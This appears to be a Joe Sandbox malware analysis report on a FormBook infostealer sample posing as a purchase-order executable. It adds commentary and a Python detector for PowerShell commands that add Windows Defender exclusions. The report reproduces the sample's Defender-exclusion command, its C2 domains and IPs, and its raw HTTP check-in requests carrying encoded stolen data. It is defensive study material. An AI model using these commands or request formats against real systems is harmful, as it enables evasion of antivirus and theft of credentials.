
Windows Analysis Report
PO 20495088.exe

Overview

General Information

Sample name: PO 20495088.exe
Analysis ID: 1557623
MD5: 68465dd1e3101b1bfa0cff10ebadb8cc
SHA1: 31a5c7aa99d175e9ed04c325831c8ad7b281a255
SHA256: d709e53e4afc4e29076812e41282fe82bcf2f3d73abe7016f13a41f432f4bd75
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO 20495088.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\PO 20495088.exe" MD5: 68465DD1E3101B1BFA0CFF10EBADB8CC)
    • powershell.exe (PID: 1396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO 20495088.exe (PID: 4984 cmdline: "C:\Users\user\Desktop\PO 20495088.exe" MD5: 68465DD1E3101B1BFA0CFF10EBADB8CC)
      • sKyuoUfZdk.exe (PID: 2180 cmdline: "C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdiagnhost.exe (PID: 2132 cmdline: "C:\Windows\SysWOW64\sdiagnhost.exe" MD5: 76676F0A21E6AF109845151B3CEFE211)
          • sKyuoUfZdk.exe (PID: 1896 cmdline: "C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author):
  00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  (the report collapses the remaining entries here; the full list of memory matches appears under AV Detection below)
Yara matches in unpacked PE files (Source | Rule | Description | Author):
  6.2.PO 20495088.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  6.2.PO 20495088.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Sigma matches on the PowerShell process start (three rules fired on the same event):
  Rule authors: Florian Roth (Nextron Systems) [two rules]; Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Event data:
    Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
    CommandLine|base64offset|contains: ~2yzw
    Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: "C:\Users\user\Desktop\PO 20495088.exe"
    ParentImage: C:\Users\user\Desktop\PO 20495088.exe
    ParentProcessId: 2228
    ParentProcessName: PO 20495088.exe
    ProcessId: 1396
    ProcessName: powershell.exe
Note the path mismatch: the command line names the System32 PowerShell, but the image actually started lives under SysWOW64, because the 32-bit parent (the sample is a 32-bit PE) is subject to WOW64 file-system redirection. Detection logic keyed on the PowerShell image path must accept both locations. The exclusion is added for the sample's own path on the Desktop, so it protects only that file from later scans; the injected payload running inside sdiagnhost.exe is not covered by it.
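The Sigma matches above fire on a plaintext Add-MpPreference -ExclusionPath command line; the "Powershell Base64 Encoded MpPreference Cmdlet" rule exists because the same cmdlet is often passed through -EncodedCommand, where a plain substring match no longer sees it. The Python below is an added example, not part of the Joe Sandbox report or of Sigma's own code: it reproduces the base64offset construction (three base64 fragments, one per 3-byte alignment, of the UTF-16LE keyword), decodes the encoded form, and extracts the excluded path from process-creation events. The events are constructed: the first reproduces the command line recorded here (PID 1396, parent PID 2228), the other two, including dropper.exe and stage.exe, are made up for contrast.

```python
"""Detect PowerShell command lines that add Windows Defender exclusions, in plaintext
or hidden behind -EncodedCommand. Added example; not part of the Joe Sandbox report."""
from __future__ import annotations

import base64
import re

# Cmdlets that change Defender settings, and the parameters that carve out exclusions.
MP_CMDLETS = ("Add-MpPreference", "Set-MpPreference")
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionProcess",
                    "-ExclusionExtension", "-ExclusionIpAddress")


def base64offset_variants(keyword: str) -> list[str]:
    """Three base64 fragments that match `keyword` encoded as UTF-16LE (the encoding
    PowerShell uses for -EncodedCommand) at any of the three 3-byte alignments.
    Same construction as Sigma's base64offset modifier."""
    raw = keyword.encode("utf-16-le")
    start = (0, 2, 3)      # leading chars that depend on the shift bytes
    end = (None, -3, -2)   # trailing chars that depend on the padding
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b" " * shift + raw).decode("ascii")
        variants.append(enc[start[shift]:end[(len(raw) + shift) % 3]])
    return variants


def contains_encoded_keyword(text: str, keyword: str) -> bool:
    """True if `text` contains the base64 of UTF-16LE `keyword` at any alignment."""
    return any(v in text for v in base64offset_variants(keyword))


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the script behind -EncodedCommand / -enc / -ec / -e, or None."""
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def detect_defender_exclusion(event: dict) -> dict | None:
    """Evaluate one process-creation event (keys Image, CommandLine, ParentImage) and
    return a finding, or None if it does not add a Defender exclusion."""
    image = event.get("Image", "").lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    cmd = event.get("CommandLine", "")
    script, encoded = cmd, False
    if not any(c.lower() in cmd.lower() for c in MP_CMDLETS):
        # No plaintext cmdlet: look for its base64 form, then decode the whole script.
        if not any(contains_encoded_keyword(cmd, c) for c in MP_CMDLETS):
            return None
        decoded = decode_encoded_command(cmd)
        if decoded is None:
            return None
        script, encoded = decoded, True
    params = [p for p in EXCLUSION_PARAMS if p.lower() in script.lower()]
    if not params:
        return None
    # Argument after the first exclusion parameter: "quoted", 'quoted' or a bare token.
    m = re.search(re.escape(params[0]) + r"\s+(?:\"([^\"]*)\"|'([^']*)'|(\S+))", script, re.I)
    value = next((g for g in m.groups() if g), None) if m else None
    return {"parent": event.get("ParentImage"), "encoded": encoded,
            "parameters": params, "value": value}


def scan(events: list[dict]) -> list[dict]:
    """Run the detector over a list of events and keep the findings."""
    return [f for f in map(detect_defender_exclusion, events) if f]


# Constructed test events. The first reproduces the command line recorded in this
# report (PID 1396, parent PID 2228); the other two are made up for contrast.
ENCODED_SCRIPT = "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\stage.exe'"
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                       r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"',
        "ParentImage": r"C:\Users\user\Desktop\PO 20495088.exe",
    },
    {   # same cmdlet hidden behind -EncodedCommand (hypothetical dropper)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand "
                       + base64.b64encode(ENCODED_SCRIPT.encode("utf-16-le")).decode("ascii"),
        "ParentImage": r"C:\Users\user\Desktop\dropper.exe",
    },
    {   # benign: Get-MpPreference only reads the configuration
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-MpPreference",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The alignment trick matters because base64 encodes 3 bytes into 4 characters: the same keyword produces a different character sequence depending on its byte offset modulo 3, so a single base64 literal misses two thirds of the encoded command lines. Once a hit is found the whole -EncodedCommand payload is decoded and the excluded path is pulled from the plaintext, which is what an analyst needs to judge what the exclusion protects.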
Suricata IDS alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2), severity 1, classtype "A Network Trojan was detected", source 192.168.2.5, destination port 80, TCP:

  Timestamp                        Src port  Destination IP
  2024-11-18T13:53:55.227011+0100  49981     13.248.169.48
  2024-11-18T13:54:19.559545+0100  49986     208.91.197.27
  2024-11-18T13:54:33.545770+0100  49990     149.115.238.44
  2024-11-18T13:54:47.013061+0100  49994     75.2.103.23
  2024-11-18T13:55:00.343673+0100  49998     3.33.130.190
  2024-11-18T13:55:13.810779+0100  50002     203.161.49.193
  2024-11-18T13:55:28.069698+0100  50006     104.21.74.79
  2024-11-18T13:55:41.385027+0100  50010     15.197.204.56

Suricata IDS alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3), severity 1, classtype "A Network Trojan was detected", source 192.168.2.5, destination port 80, TCP:

  Timestamp                        Src port  Destination IP
  2024-11-18T13:54:11.191475+0100  49983     208.91.197.27
  2024-11-18T13:54:13.720381+0100  49984     208.91.197.27
  2024-11-18T13:54:16.283499+0100  49985     208.91.197.27
  2024-11-18T13:54:25.903982+0100  49987     149.115.238.44
  2024-11-18T13:54:28.439248+0100  49988     149.115.238.44
  2024-11-18T13:54:31.002383+0100  49989     149.115.238.44
  2024-11-18T13:54:39.371399+0100  49991     75.2.103.23
  2024-11-18T13:54:41.914814+0100  49992     75.2.103.23
  2024-11-18T13:54:44.536201+0100  49993     75.2.103.23
  2024-11-18T13:54:52.679411+0100  49995     3.33.130.190
  2024-11-18T13:54:55.249077+0100  49996     3.33.130.190
  2024-11-18T13:54:57.793693+0100  49997     3.33.130.190
  2024-11-18T13:55:06.170220+0100  49999     203.161.49.193
  2024-11-18T13:55:08.732594+0100  50000     203.161.49.193
  2024-11-18T13:55:11.279589+0100  50001     203.161.49.193
  2024-11-18T13:55:20.373450+0100  50003     104.21.74.79
  2024-11-18T13:55:22.916474+0100  50004     104.21.74.79
  2024-11-18T13:55:25.468482+0100  50005     104.21.74.79
  2024-11-18T13:55:33.729770+0100  50007     15.197.204.56
  2024-11-18T13:55:36.299878+0100  50008     15.197.204.56
  2024-11-18T13:55:38.839198+0100  50009     15.197.204.56
  2024-11-18T13:55:47.418870+0100  50011     188.114.97.3
  2024-11-18T13:55:49.916029+0100  50012     188.114.97.3
  2024-11-18T13:55:52.522957+0100  50013     188.114.97.3

Read together, the two tables show the check-in cadence: for each C2 host the sample sends three POST check-ins about 2.5 s apart, followed about 2.5 s later by one GET, then moves to the next host after a gap of roughly 6 s. Within the alerts shown, 13.248.169.48 received only the GET and 188.114.97.3 only the three POSTs. The steady 2.5 s spacing and the per-host rotation through nine domains in under two minutes are the behaviours worth alerting on; the IP addresses themselves are rotated by the operator and several belong to shared cloud ranges (see the ASN entries under Networking).


                AV Detection

Source: PO 20495088.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO 20495088.exe | Joe Sandbox ML: detected
Source: PO 20495088.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO 20495088.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: sKyuoUfZdk.exe, 00000008.00000000.2506589550.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3898414307.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP | source: PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SL.pdbSHA256 | source: PO 20495088.exe
Source: Binary string: wntdll.pdb | source: PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdb | source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SL.pdb | source: PO 20495088.exe
Source: Binary string: sdiagnhost.pdbGCTL | source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function 9_2_001CC700: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function 0_2_0748E4B6: 4x nop then jmp 0748ECAAh
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function 9_2_001B9D80: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function 9_2_042404DE: 4x nop then mov ebx, 00000004h

Two of these strings deserve a caveat before they are turned into indicators. The PDB path R:\JoeSecurity\...\FakeChrome\Release\Chrome.pdb is read from the image region of sKyuoUfZdk.exe (PIDs 2180 and 1896), which indicates that the randomly named file under C:\Program Files (x86)\eAGndGflZt...\ is a copy of Joe Sandbox's own FakeChrome tool binary; its MD5 32B8AD6ECA9094891E792631BAEA9717 is therefore specific to this analysis environment and not an indicator of the malware. Likewise, wntdll.pdb appearing in the sample's and sdiagnhost.exe's memory reflects a fresh copy of ntdll being mapped (consistent with the direct/indirect syscall and custom-stack signatures above) rather than a string of the payload itself. The FindFirstFileW/FindNextFileW/FindClose loop and the nop-padded code in sdiagnhost.exe are the injected FormBook payload at work, consistent with the browser and mail credential-harvesting signatures.

                Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49981 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 149.115.238.44:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 149.115.238.44:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 149.115.238.44:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 149.115.238.44:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 75.2.103.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 203.161.49.193:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 203.161.49.193:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 203.161.49.193:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 203.161.49.193:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 104.21.74.79:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 104.21.74.79:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 104.21.74.79:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 104.21.74.79:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 188.114.97.3:80
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | IP Address: 75.2.103.23
Source: Joe Sandbox View | IP Address: 203.161.49.193
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (9 occurrences)
Source: global traffic | HTTP traffic detected: eight GET requests, one per C2 domain. All eight carry the same headers:
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
Request lines, with the Host header of each:
  Host: www.habitat.rent
    GET /qamt/?3Vh=yvQMRWxE2iO5NiGttbyWAgCre54yjFUaAy+iSkz1i7eGywRcxpKEFNt/NGEMHOrlTtjc9BmVSmuvb6I2HEY7edCQWcNrZNkx1k+cySMijmBFLnX5HqbQY2Sgr5WEpsgKJA==&GLvL=i6ILStp HTTP/1.1
  Host: www.fedegaritech.online
    GET /sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp HTTP/1.1
  Host: www.newegg.club
    GET /z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg== HTTP/1.1
  Host: www.urssaf.pro
    GET /z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp HTTP/1.1
  Host: www.livelovechat.live
    GET /pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg== HTTP/1.1
  Host: www.inspires.website
    GET /tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp HTTP/1.1
  Host: www.tenmyk.shop
    GET /qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A== HTTP/1.1
  Host: www.isirumah.info
    GET /guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp HTTP/1.1
Across the eight requests the host and the four-character path change every time, while the parameter names (3Vh, GLvL) and the GLvL value (i6ILStp) stay constant and only the parameter order varies; those invariants survive domain rotation and are the better hunting pivot. The User-Agent claims Opera 31 on Chrome 44 running on Windows 8 ("Windows NT 6.2"), which does not match the Windows 10 analysis system or any browser that was launched.
Source: global traffic | DNS query: www.habitat.rent
Source: global traffic | DNS query: www.fedegaritech.online
Source: global traffic | DNS query: www.newegg.club
Source: global traffic | DNS query: www.urssaf.pro
Source: global traffic | DNS query: www.livelovechat.live
Source: global traffic | DNS query: www.inspires.website
Source: global traffic | DNS query: www.tenmyk.shop
Source: global traffic | DNS query: www.isirumah.info
Source: global traffic | DNS query: www.ssrnoremt-rise.sbs
Source: unknown | HTTP traffic detected:
  POST /sxrn/ HTTP/1.1
  Host: www.fedegaritech.online
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.5
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 204
  Connection: close
  Cache-Control: no-cache
  Origin: http://www.fedegaritech.online
  Referer: http://www.fedegaritech.online/sxrn/
  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
  Body (the report's raw hex dump encodes these same bytes): 3Vh=22IXvGDfL+3zoEGpIqsuhEyYntezNGIvnEPrbtwuQSZBn7O6zO8eG7bYA8jDk/PZbbYrtsuEzGJf9gxNg4z/M83JlPVx3SDOgJ5BQxoeoaF5UceOTQ0olcBA5FpL5cSIap9S657+Lm2Q9QiUv0yRqxAx0pTb9KIPlRdI8ABKr7Cp6SawLmgEryu1esoynwFmE3ymOrc=
